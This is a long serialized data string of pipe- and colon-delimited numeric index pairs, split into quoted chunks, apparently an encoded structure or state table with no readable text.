1|2:2|5:19|3:1222|15:325|4:423|17:24|18:24|5:19|5:19;n;'
- ..'3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1223|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1224|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1225|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1226|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1227|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1228|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1229|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1230|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1231|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1232|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1233|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1234|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1235|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1236|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1237|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1238|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1239|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1240|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2'
- ..'|5:19|3:1241|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1242|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1243|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1244|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1245|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1246|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1247|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1248|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1249|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1250|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1251|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:460|14:461|3:1252|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1253|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1254|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1255|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1256|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1257|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1258|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1259|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1260|'
- ..'15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1261|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1262|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1263|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1264|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1265|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1266|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1267|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1268|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1269|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:1270|15:996|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:10|10:1271;4|9:10|10:1272;4|9:10|10:1273;p;1|1:421|2:2|3:1274|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1275|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1276|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1277|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1278|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1279|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1280|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1281|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:'
- ..'19|3:1282|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1283|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;2;n;1|2:2|5:131|14:395|3:1284|15:1285|4:398|5:131|5:131;1|2:2|5:131|14:395|3:1286|15:1287|4:398|5:131|5:131;1|1:403|2:2|5:404|3:1288|15:1289|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:1290|15:1285|4:414|5:131|5:131;1|2:2|5:131|14:395|3:1291|15:1287|4:398|5:131|5:131;1|2:2|5:131|14:395|3:1292|15:1285|4:419|18:24|5:131|5:131;n;4|9:258|10:1293;4|9:258|10:1294;4|9:258|10:1295;4|9:258|10:1296;p;7|1:420;p;1|2:2|3:1297|15:996|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;2|1:765;n;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:1298|15:153|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;p;10|5:32|3:1299|15:153|16:1300|4:35|17:25|18:24|5:32|5:32;1|1:36|5:37|3:1301|15:153|16:1302|4:40|17:24|21:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:1303|15:153|16:1304|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:1305|15:153|16:1306|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;1|1:73|5:37|3:1307|15:153|16:1308|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;12|1:45|25:81;12|1:45|25:82;12|1:45|25:81;1|1:83|5:84|3:1309|15:153|16:1310|4:87|17:24|5:84|5:84;n;7;9|9:185|10:1311;9|9:10|10:88;p;12|1:45|25:89;12|1:45|25:90;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:45|25:95;12'
- ..'|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:1312|15:297|16:1313|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:1314;9|9:119|10:120;p;1|1:113|5:84|3:1315|15:153|16:1316|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:158|10:1317;9|9:124|10:125;p;1|1:113|5:32|3:1318|15:153|16:1319|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;9|9:158|10:1320;p;1|1:113|5:131|3:1321|15:1322|16:1323|4:135|17:25|18:25|5:131|5:131;n;11;9|9:804|10:1324;p;1|1:113|5:19|3:1325|15:150|16:1326|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:1327;p;1|1:113|5:19|3:1328|15:150|16:1329|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:32|3:1330|15:297|16:1331|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;p;1|1:113|5:19|3:1332|15:137|16:1333|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:252|10:1334;p;1|1:113|5:84|3:1335|15:21|16:1336|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:1337;9|9:162|10:1338;9|9:162|10:1339;9|9:162|10:1340;9|9:160|10:161;9|9:160|10:164;9|9:158|10:159;9|9:158|10:1341;9|9:158|10:1342;9|9:162|10:1343;9|9:158|10:1344;p;1|1:113|5:9|3:1345|15:137|16:1346|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:19|3:1347|15:137|16:1348|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:391|10:1349;9|9:178|10:179;p;1|1:113|5:9|3:1350|15:137|16:1351|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:131|30:187|3:1352|15:1322|16:1353|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:192|10:1354;p;1|1:113|5:131|3:1355|15:325|16:1356|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:1357;9|9:158|10:199;9|9:158|10:1358;9|9:162|10'
- ..':1359;9|9:158|10:202;p;1|1:113|5:32|3:1360|15:153|16:1361|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:205|29:157;9|9:162|10:1362;9|9:178|10:253;9|9:237|10:1363;9|9:391|10:1364;p;1|1:113|5:84|3:1365|15:370|16:1366|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1367;p;1|5:19|3:1368|15:297|16:1369|4:213|17:24|18:214|5:19|5:19;n;4|9:215|10:216;p;1|1:113|5:131|3:1370|15:1322|16:1371|4:135|17:25|18:25|5:131|5:131;n;11;9|9:223|10:1372;p;1|1:113|5:131|30:187|3:1373|15:1322|16:1374|4:190|17:25|18:25|5:131|5:131;n;11|22:191;p;1|1:113|5:84|3:1375|15:370|16:1376|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1377;p;1|1:113|5:131|3:1378|15:325|16:1379|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:1380;9|9:158|10:1381;p;1|5:19|3:1382|15:297|16:1383|4:234|17:24|18:24|5:19|5:19;n;9|9:260|10:1384;9|9:124|10:1385;9|9:318|10:1386;p;1|1:113|5:19|3:1387|15:153|16:1388|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;9|9:162|10:1389;p;1|1:113|5:19|3:1390|15:281|16:1391|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:84|3:1392|15:297|16:1393|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:256|10:1394;p;1|1:113|5:19|3:1395|15:150|16:1396|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:252|10:253;9|9:119|10:251;p;1|1:113|3:1397|15:297|16:1398|4:247|27:25|17:157|18:25;n;11|24:25;9|9:260|10:261;9|9:256|10:1399;9|9:124|10:248;4|9:258|10:259;p;1|5:84|3:1400|15:153|16:1401|4:264|31:7|17:24|32:25|18:25|5:84|5:84;n;9|9:270|10:1402;9|9:10|10:267;p;1|5:32|3:1403|15:21|16:1404|4:274|31:7|18:24|5:32|5:32;1|5:19|3:1405|15:297|16:1406|4:213|17:24|18:214|5:19|5:19;n;9|9:260|10:279;9|9:904|10:1407;p;1|1:113|5:9|3:1408|15:242|16:1409|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:84|3:1410|15:153|16:1411|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:15'
- ..'7;9|9:162|10:288;9|9:162|10:286;9|9:162|10:287;9|9:158|10:290;9|9:158|10:1412;9|9:160|10:295;9|9:158|10:289;9|9:160|10:1413;9|9:158|10:1414;p;1|1:113|5:19|3:1415|15:115|16:1416|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;9|9:306|10:1417;9|9:217|10:302;9|9:217|10:1418;9|9:217|10:301;9|9:217|10:1419;4|9:303|10:304;9|9:308|10:1420;p;1|1:113|5:32|3:1421|15:153|16:1422|4:312|27:25|18:25|5:32|5:32;n;11|24:25;p;1|5:19|3:1423|15:297|16:1424|4:234|17:24|18:24|5:19|5:19;n;9|9:318|10:1425;9|9:124|10:1426;9|9:124|10:1385;p;1|1:113|5:84|3:1427|15:370|16:1428|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1429;p;1|1:113|5:19|3:1430|16:1431|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;9|9:391|10:1432;p;1|1:113|5:19|3:1433|15:150|16:1434|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|5:19|3:1435|15:281|16:1436|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:1437;p;1|1:113|5:19|3:1438|16:1439|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:119|10:1440;4|9:350|10:1441;p;1|1:113|5:32|3:1442|15:153|16:1443|4:312|27:25|18:25|5:32|5:32;n;11|24:25;4|9:340|10:341;p;1|1:113|5:84|3:1444|15:370|16:1445|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:345|10:1446;9|9:252|10:1447;4|9:340|10:1448;p;1|5:19|3:1449|15:153|16:1450|4:349|31:7|5:19|5:19;1|1:113|5:84|3:1451|15:370|16:1452|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;p;1|1:113|5:19|3:1453|15:115|16:1454|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;9|9:308|10:1455;9|9:904|10:1456;p;1|1:113|5:9|3:1457|15:242|16:1458|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:185|10:1459;9|9:162|10:1460;9|9:176|10:1461;p;1|1:113|5:19|3:1462|15:325|16:1463|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:252|10:1464;9|9:119|10:368;4|9:350|10:1465;9|9:119|10:1466;9|9:119|10:367;p;1|1:113|5:84|3:1467|15:207|16:1468|4:344|31:7|17:157|18:25'
- ..'|5:84|5:84;n;11|24:25;9|9:372|10:1469;9|9:252|10:1470;4|9:340|10:374;p;1|5:19|3:1471|15:153|16:1472|4:349|31:7|5:19|5:19;n;9|9:162|10:1473;p;1|1:113|5:380|30:187|14:381|3:1474|16:1475|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;9|9:391|10:1476;p;1|1:113|5:32|3:1477|16:1478|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;p;p;p;p;1|2:2|3:1479|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:192|10:1480;p;1|2:2|3:1481|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:10|10:11;4|9:10|10:1482;4|9:10|10:12;4|9:10|10:13;p;1|2:2|3:1483|15:996|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|2:2|3:1484|15:153|4:467;n;4|9:428|10:470;p;1|1:421|2:2|3:1485|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1486|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1487|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1488|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1489|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:460|14:461|3:1490|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1491|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1492|15:21|4:608|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1493|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1494|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1495|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1496|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1497|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5'
- ..':424|5:424;p;1|1:421|2:2|5:19|3:1498|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1499|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1500|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:1501|15:21|4:427;n;4|9:428|10:1502;4|9:468|10:1503;p;2;n;1|2:2|5:131|14:395|3:1504|15:397|4:398|5:131|5:131;n;4|9:141|10:399;p;1|2:2|5:131|14:395|3:1505|15:401|4:398|5:131|5:131;n;4|9:141|10:402;p;1|1:403|2:2|5:404|3:1506|15:406|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:1507|15:397|4:414|5:131|5:131;n;4|9:141|10:415;p;1|2:2|5:131|14:395|3:1508|15:401|4:398|5:131|5:131;n;4|9:141|10:417;p;1|2:2|5:131|14:395|3:1509|15:397|4:419|18:24|5:131|5:131;7|1:420;p;2|1:765;n;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:1510|15:21|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;9|9:10|10:29;9|9:10|10:30;9|9:10|10:31;9|9:10|10:1511;9|9:10|10:1512;p;10|5:32|3:1513|15:21|16:34|4:35|17:25|18:24|5:32|5:32;1|1:36|5:37|3:1514|15:21|16:39|4:40|17:24|21:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:1515|15:21|16:57|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:1516|15:21|16:72|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;1|1:73|5:37|3:1517|15:21|16:75|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:1518;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;12|1:45|25:81;12|1:45|2'
- ..'5:82;12|1:45|25:81;1|1:83|5:84|3:1519|15:21|16:86|4:87|17:24|5:84|5:84;n;7;9|9:10|10:88;9|9:185|10:1520;p;12|1:45|25:89;12|1:45|25:90;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:45|25:95;12|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:1521|15:115|16:116|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:1314;9|9:119|10:1522;p;1|1:113|5:84|3:1523|15:21|16:122|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:237|10:796;9|9:124|10:240;p;1|1:113|5:32|3:1524|15:21|16:127|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;9|9:237|10:799;p;1|1:113|5:131|3:1525|15:133|16:134|4:135|17:25|18:25|5:131|5:131;n;11;p;1|1:113|5:19|3:1526|15:137|16:138|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:143;9|9:119|10:1527;9|9:141|10:1528;p;1|1:113|5:19|3:1529|15:137|16:145|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:1530;p;1|1:113|5:32|3:1531|15:115|16:148|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:119|10:1522;p;1|1:113|5:19|3:1532|15:150|16:151|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:252|10:251;p;1|1:113|5:84|3:1533|15:153|16:154|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:1341;p;1|1:113|5:9|3:1534|15:150|16:167|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1535;9|9:171|10:1536;p;1|1:113|5:19|3:1537|15:150|16:174|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:391|10:1538;9|9:176|10:177;p;1|1:113|5:9|3:1539|15:150|16:181|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:158|10:183;9|9:158|10:184;9|9:176|10:186;p;1|1:113|5:131|30:187|3:1540|15:133|16:189|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:192|10:193;p'
- ..';1|1:113|5:131|3:1541|16:195|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:200;p;1|1:113|5:32|3:1542|15:21|16:204|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:205|29:157;p;1|1:113|5:84|3:1543|15:207|16:208|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|5:19|3:1544|15:115|16:212|4:213|17:24|18:214|5:19|5:19;n;4|9:215|10:216;9|9:260|10:1545;9|9:217|10:218;p;1|1:113|5:131|3:1546|15:133|16:220|4:135|17:25|18:25|5:131|5:131;n;11;9|9:804|10:1547;9|9:223|10:224;9|9:221|10:222;p;1|1:113|5:131|30:187|3:1548|15:133|16:226|4:190|17:25|18:25|5:131|5:131;n;11|22:191;p;1|1:113|5:84|3:1549|15:207|16:229|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|1:113|5:131|3:1550|16:231|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:1551;9|9:158|10:1552;9|9:162|10:201;p;1|5:19|3:1553|15:115|16:233|4:234|17:24|18:24|5:19|5:19;n;9|9:260|10:1554;9|9:217|10:1555;p;1|1:113|5:19|3:1556|15:21|16:236|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;9|9:237|10:238;9|9:124|10:240;p;1|1:113|5:19|3:1557|15:242|16:243|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:1558;9|9:119|10:1559;p;1|1:113|5:84|3:1560|15:115|16:246|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:260|10:1561;p;1|1:113|5:19|3:1562|15:137|16:250|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|3:1563|15:115|16:255|4:247|27:25|17:157|18:25;n;11|24:25;p;1|5:84|3:1564|15:21|16:263|4:264|31:7|17:24|32:25|18:25|5:84|5:84;1|5:32|3:1565|15:153|16:273|4:274|31:7|18:24|5:32|5:32;n;9|9:221|10:276;9|9:303|10:1566;9|9:265|10:275;9|9:265|10:1567;p;1|5:19|3:1568|15:115|16:278|4:213|17:24|18:214|5:19|5:19;n;4|9:215|10:216;9|9:904|10:1407;9|9:260|10:279;p;1|1:113|5:9|3:1569|